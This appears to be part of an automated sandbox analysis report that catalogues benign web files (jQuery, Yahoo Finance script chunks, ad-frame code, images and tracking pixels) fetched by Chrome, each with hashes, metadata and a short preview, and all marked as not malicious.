                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:if (!window.mraid) {document.write('\x3cdiv id="ad_unit"\x3e');}document.write('\x3cstyle\x3ediv{margin:0;padding:0;}.abgcp{height:15px;padding-right:1px;padding-top:1px;padding-left:9px;padding-bottom:9px;right:0px;top:0px;position:absolute;width:31px;z-index:2147483646;}.abgc{display:block;height:15px;position:absolute;right:1px;top:1px;text-rendering:geometricPrecision;z-index:2147483646;}.abgb{display:inline-block;height:15px;}.abgc,.abgcp,.jar .abgc,.jar .abgcp,.jar .cbb{opacity:1;}.abgc{cursor:pointer;}.cbb{cursor:pointer;height:15px;width:15px;z-index:2147483646;background-color:#ffffff;opacity:0;}.cbb svg{position:absolute;top:0;right:0;height:15px;width:15px;stroke:#00aecd;fill:#00aecd;stroke-width:1.25;}.abgb{position:absolute;right:16px;top:0px;}.cbb{position:absolute;right:0px;top:0px;}.abgs{display:none;height:100%;}.abgl{text-decoration:none;}.abgs svg,.abgb svg{display:inline-block;height:15px;width:auto;vertical-align:top;}.abgc .il-wrap{background-color:#ffffff;height:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (47459)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):47460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.397735966179774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:mLCcfjNm527JH/2V9d7ch8QMQvjdDdSzCTLo5RP8X60Yo6z63H1KCZwinCb+I298:mxNmeJH/e9d7cqK+CT0Q6zmL8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5D332FD1AE9FEB79A10425DFC3F84FE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C7D7F9D2BF5EE08E242765803CDD3A223FE1CBFC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2EA786910282DF7AE154A0011375CD1254ADBD8EF0E75EB62177ADA67DAF9611
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:01CDAC8103290B0FC1BF9BE8EE3923BFA6B8AD7778FF6B4716E421D6BBB3382240D9316B9994D6F4EA87E67DA9791EB8E3E2A1AAF81DBD749B3C8D7778E15F20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:"use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var f=e[l](h),p=f.value}catch(s){n(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function h(p){Wt(l,o,c,h,f,"next",p)}function f(p){Wt(l,o,c,h,f,"throw",p)}h(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):89501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3412), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0908215241003845
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:YozhSx5M2PjYJakqOPyGbmq1Tk0GGbLq12k0yXD0THZHL2yVLT4hk14yIJZFOtkK:3hqjg8q1Tr9q12ryw1L2UPq1ktkNCYc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:956DABF4D28930BC42D934995B814D6D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D461E2FAB9B3E6F89561FEB5C2A5CBBB26198951
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CA9998A600267DC2431ABC077F8CF7A5476A46EE1E82D0C6F12BB17E512C3FE8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6A98F3C8201E544DB161FA89E8A434B35B179F7D33446247B13EA08B43A7E79D44025524AEFDE0215827B2B2B95F8AC349712DCA00AA3073DDF2C4EE11B9F710
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-text",[],t):"object"==typeof exports?exports["wafer-text"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-text"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(o){if(r[o])return r[o].exports;var n=r[o]={i:o,l:!1,exports:{}};return e[o].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,o){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:o})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (49207)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):54797
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.243829478413232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:MKaXx378IxwgwMw7q9HcvflvHm1IxpttLrpylZ3n:MKaXx378IWflvHmYpttLrpaZ3n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:282C875CFF2A6FD51D4AD74F4AD3EF55
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E7CAA5F44F357D7ADEDDC43869EC245DB879E52E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5E29F5D0764ADC8EB7D407A76D90762FEEAF87D327A1EAD710219EC64E12281F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:66EED898B1CBF93FA4619940438B1CDE675883CB63BE3C9A593787E729543BF65B02C4704FBB274AC09B8F00AD8C09BFB8DC2523E1B1DE18F7A8CD22CA6F63A6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/ReorderHandle.DgSywDQr.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{v as Ee,af as De,ag as se,ah as He,E as Ge,s as b,n as z,t as Ae,h as ze,k as Le,m as Oe,i as Be}from"./scheduler.Dr9AAxFe.js";import{S as L,i as ee,c as fe,b as pe,m as me,t as Se,a as Ce,d as we}from"./index.DCSmZEjO.js";import{b as ue,w as Te,d as qe}from"./43.CtYdpA_T.js";import{I as ke}from"./Icon.BSWt_jx8.js";const Ne=/[&"<]/g,je=/[&<]/g;function Ue(e,o=!1){const t=String(e),n=o?Ne:je;n.lastIndex=0;let r="",i=0;for(;n.test(t);){const l=n.lastIndex-1,s=t[l];r+=t.substring(i,l)+(s==="&"?"&amp;":s==='"'?"&quot;":"&lt;"),i=l+1}return r+t.substring(i)}function Xe(e,o){if(!e||!e.$$render)throw new Error(`<${o}> is not a valid SSR component. You may need to review your build config to ensure that dependencies are compiled, rather than imported as pre-compiled modules. Otherwise you may need to fix a <${o}>.`);return e}let B;function Re(e){function o(t,n,r,i,l){const s=He,u={on_destroy:B,context:new Map(l||(s?s.$$.context:[])),on_mount:[],before_update:[],after_update:[],callbacks
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (13714), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13714
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.23465777657958
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:3oEREi6qrvGmlR1IaKJoCmXK6Tb8JIFbXv00O8jp4f3tjf+88uLUH:4ER1XDlR1xVNXK6Tb8JknODjm88u4H
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:94D07DAA349C254B35FFCDA6E54CC754
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C46D6650E0F01C7F2977182F8FE5D5A07ABA9EE5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0291E42C6C243B4177E0331B6E3692A8E03E29A39852790CE81604A998872C68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8B3FEB7625D38BD50F22B838A14868D15EEBE1DFE6715A422B777A267585A1BAF9DE5982A29089C6BB7C0FC3DEAE8CE8B57F1BE851F78F1EECC9B625F08917CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-form-1.34.5-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-form",[],t):"object"==typeof exports?exports["wafer-form"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-form"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r=window.webpackJsonpwafer_wafers_wafer_form;window.webpackJsonpwafer_wafers_wafer_form=function(t,n,o){for(var a,s,u=0,l=[];u<t.length;u++)s=t[u],i[s]&&l.push(i[s][0]),i[s]=0;for(a in n)Object.prototype.hasOwnProperty.call(n,a)&&(e[a]=n[a]);for(r&&r(t,n,o);l.length;)l.shift()()};var n={},i={1:0,2:0};return t.e=function(e){function r(){s.onerror=s.onload=null,clearTimeout(u);var t=i[e];0!==t&&(t&&t[1](new Error("Loading chunk "+e+" failed.")),i[e]=void 0)}var n=i[e];if(0===n)return new Promise(function(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (24198)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):27250
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.422066925434296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:e39Vu+xvhAOGtK0oVa7CD+SaRitSCoz+P0Yed+4JrkKstSpgVJmR/6yIhXcR0hz5:oVugL49WhWiyIheH0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FD39F918D0957C84043CC7394111F483
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:50F312AFD12557466B10F928C6051C65B249064F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F7968C47728F3CD9299AC231F762AD7BE904748D5CC1CB7EDB02CA6630245D09
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FF36A079F9D106E01B4A1F238D3C9CB212C609E26B76A50B094301F9407EC8607B3751780E43095435683623AEB6DC964891717326F149D2925F6AC929D93C08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uc/sf/0.1.491/js/safe.modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! SAFEFRAME 0.1.491 . 2024, Yahoo Inc. All rights reserved. */(()=>{var e={466:e=>{var t;(t=void 0===t?{}:t).close={name:"close",height:48,width:48,path:"M37.98 34.827l-9.9-9.9 9.9-9.898c.78-.782.78-2.05 0-2.83-.78-.78-2.047-.78-2.828 0l-9.9 9.9-9.898-9.9c-.78-.78-2.048-.78-2.828 0-.78.78-.78 2.047 0 2.828l9.9 9.9-9.9 9.898c-.78.78-.78 2.047 0 2.828.78.78 2.047.78 2.828 0l9.9-9.9 9.898 9.9c.78.78 2.048.78 2.828 0 .782-.78.782-2.047 0-2.827z"},e.exports&&(e.exports=t.close)},228:e=>{var t;(t=void 0===t?{}:t)["decline-fill"]={name:"decline-fill",height:48,width:48,path:"M24 1C11.3 1 1 11.3 1 24s10.3 23 23 23 23-10.3 23-23S36.7 1 24 1zm9.8 32.8c-.9.9-2.2.9-3.1 0L24 27l-6.8 6.8c-.9.9-2.2.9-3.1 0s-.9-2.2 0-3.1l6.8-6.8-6.7-6.7c-.9-.9-.9-2.2 0-3.1.9-.9 2.2-.9 3.1 0l6.7 6.7 6.7-6.7c.9-.9 2.2-.9 3.1 0 .9.9.9 2.2 0 3.1l-6.7 6.7 6.7 6.8c.9.9.9 2.3 0 3.1z"},e.exports&&(e.exports=t["decline-fill"])},586:(e,t,n)=>{"use strict";var o=n(427),r=n(215),i=n(945);function s(){}function a(e){return e&&"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (809)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):810
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.167841344303189
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:PI27CvxwVMPeVisbJdgKLZIuxS2sT1baskGqytgeGo9ZsV:PVOg4sda6yB4eV8V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:764F0C0A0C5802476EC6CEC9FE462F70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:07BA3940A78404E6EBBD4B2C1BF98571FC6E786A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CBB09BAD74030EDA7EDD74D2CB8C411B8B2F7B52B437DCD5DAC57B6F67482757
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4DDC0DEBE4D720763D0EDE946E27F540E2D2890DDAEAA88C69DDC6C9B9815519909C28A199569AFB1A8EBD6A7109EFBBE2C4D28154C809FE4385933152DB9ADC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadPreferences.CaWO6w0h.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{d,e as p}from"./commonUtil.CI22_Irn.js";import{f as m,l as w}from"./logUtil.hOue7iAU.js";async function v(r,{path:n,reuse:f=!0,silent:g=!1}={}){var t,c;const[o]=await d(["experience"],r),a=await p(r);if(f){const e=o.getRegionData("dock");if(e)return e}try{const e=a.ynet==="1",l=(((t=r.url)==null?void 0:t.searchParams)||new URL(window.location.href).searchParams).get("expPreview"),u={product:"financeWeb",lang:a.lang,region:a.region,...n&&{path:n},...e&&l&&{preview:l}},s=await m(r,{isRelative:!0,pathname:"/xhr/experience",perfLabel:"loadPreferences",query:u},{credentials:"include"}),i=(c=s==null?void 0:s.container)==null?void 0:c.regions;return!g&&i&&o.loadExperience(i),i}catch(e){if(n&&n==="subscription-pricing")throw e;return w(r,{},{data:e,perfLabel:"loadPreferences"}),null}}export{v as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x156, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):25635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.961918609746134
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:Ggj+97Qb8X6ojDoSwXuWFs3JL3JPJDdVOLnnOooelz2aNgMSMSB9a1:Ggjo7TZDoLvF+JL3JPtdsniaPOMa8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1EF036CD8125CE2556E783E67B124AA8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B4A91C670CFFE229E1403DA4A27D0A25EF835356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8E30F8D4CBBA848C1EFD05ACB5494687CD7F9758D4431703248B8B4586A63D3A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4DDD903B2E929AD41AF290FC288996871422EF30AABF344CFEAC671D4CADC37837F5DA853DB40F8344F023E331CE87E2CBD6C581E7B2AF6198C05031EA701F6A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......JFIF.............C....................................................................C.........................................................................,............................................D.........................!..1.A."Qa.2q..#..BR..$3b....%4...&Crsc..................................9.......................!1....A"#2Q3a..$BCq..Rb...4D................?.....N...o..Kz....xU$...."....h...f.:.Z.`.....4..nt....%..U..H........{/I...(V..R..+...m..q....z...\.n...S..oa.u)2A.4....2*..O... .d:F.*.-Lq.m.b_.H.8..:..X.O..[W...V.Z....w........7...[...m...o..P.a......|c...>.=B%....z..X1.#8......K~.t......-,.$...E\.........%w/........5g...=..i..n......X............:..J...mE:..>;.K.u..Q...A|.Y4...^.X..,Q.<..(....!.G^.:=9h.6.u..l.#.v...;..TBb...S...>..s...`c.a.]z..t..G...}.U.......f.]y.D.6D|..I1.....U.z./4....e...............`....Pm.7`.......z{..0.......H.....N.......gp.0....$).......6....]...:U....Z..H.6;.....'$.....L.m..,N....S..V..F&X.UP.#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (3657)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3658
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.410059487154183
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:XSJl3HI3LCOsF1ArzG+FLbqXCEQVQjep7V83e7SjnKOtCy6YIC0fqI4DgPXp:CJlomOk1ArFLbH83e7+KjC5IQgvp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:45AEAC14EDCBA7E29BDE89A7704500A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7ECEE407E55800FF6B284B25DEA347FE3869DC40
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B6BFE34FB12F1E696B601E961E9D694E392FAF635D1F47829832B76D1EFFE2E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D16EC994CF3E6F93DD8707AFDC8FFD6A3D8E24EA2A143333ABEA2E02E5F2F4F874542EF56AE873C57E92C021EBD24220EB1F91C27B82DC40A2112BAE0ADF6F0E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as D,A as z,e as O,b as Z,d as F,f as H,j as J,i as S,B as C,U as c,k as K,l as L,G as E,v as Q,Y as M,T as R,c as W,u as X,g as v,a as w,Z as V,P as p}from"./scheduler.Dr9AAxFe.js";import{S as x,i as $,t as m,g as y,a as b,e as T,c as ee,b as ie,m as ne,d as le}from"./index.DCSmZEjO.js";import{g as te}from"./spread.CgU5AtxT.js";import{I as ae}from"./Icon.BSWt_jx8.js";import{g as I}from"./i13nUtil.C-uBpR7k.js";function P(l){let e,a;return e=new ae({props:{size:l[7]||l[6],icon:l[5],type:l[8],className:l[11]}}),{c(){ee(e.$$.fragment)},l(i){ie(e.$$.fragment,i)},m(i,s){ne(e,i,s),a=!0},p(i,s){const u={};s&192&&(u.size=i[7]||i[6]),s&32&&(u.icon=i[5]),s&256&&(u.type=i[8]),s&2048&&(u.className=i[11]),e.$set(u)},i(i){a||(m(e.$$.fragment,i),a=!0)},o(i){b(e.$$.fragment,i),a=!1},d(i){le(e,i)}}}function U(l){let e;const a=l[14].default,i=W(a,l,l[13],null);return{c(){i&&i.c()},l(s){i&&i.l(s)},m(s,u){i&&i.m(s,u),e=!0},p(s,u){i&&i.p&&(!e||u&8192)&&X(i,a,s,s[13],e?w(a,s[13],u,null):v(s[13]),nu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pbs.yahoo.com/setuid?bidder=sovrn&gdpr=0&gdpr_consent=&gpp=&gpp_sid=&f=i&uid=JdrCALZHfk_SRNcVTtypVGrT&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pbs.yahoo.com/setuid?bidder=yieldmo&f=i&uid=VemaRRRssVROifkNwh53&gdpr=0&gdpr_consent=&gpp=&gpp_sid=&us_privacy=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
